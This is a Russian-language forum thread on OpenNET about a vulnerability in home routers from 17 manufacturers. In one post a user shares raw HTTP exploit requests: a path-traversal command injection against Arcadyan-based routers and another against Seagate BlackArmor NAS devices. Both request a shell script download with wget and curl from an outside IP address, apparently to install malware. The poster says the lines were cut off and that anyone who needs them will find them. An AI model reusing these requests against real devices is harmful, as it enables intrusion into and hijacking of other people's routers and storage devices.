The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Уязвимость в домашних маршрутизаторах, охватывающая 17 производителей, opennews (??), 09-Авг-21, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


35. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от onanim (?), 09-Авг-21, 12:42 
на Rust, обрабатывает PHP скрипты по протоколу CGI.

вот эксплоит:

POST /images/..%2fapply_abstract.cgi HTTP/1.1
Connection: close
User-Agent: Dark

action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0AARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp;wget+http://212.192.241.72/lolol.sh;curl+-O+http://212.192.241.72...


там кстати ещё один встроен, для Seagate BlackArmor NAS:

GET /backupmgt/localJob.php?session=fail;cd+/tmp;wget+http://212.192.241.72/lolol.sh;curl+-O+http://212.192.241.72... HTTP/1.1
Connection: close
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Dark

Ответить | Правка | К родителю #20 | Наверх | Cообщить модератору

36. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от onanim (?), 09-Авг-21, 12:43 
блин, опеннет похерил разметку и обрезал длинную строку.
сами найдёте, кому надо.
Ответить | Правка | Наверх | Cообщить модератору

51. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Админ Анонимов (?), 09-Авг-21, 13:10 
>на Rust

так а где это посмотреть на чем написана реализация http-сервера от Arcadyan ?
я просто предположил что это C/C++ но не уверен и поэтому спросил у сообщества, но в ответ получил какие-то говновыхлопы

Ответить | Правка | К родителю #35 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру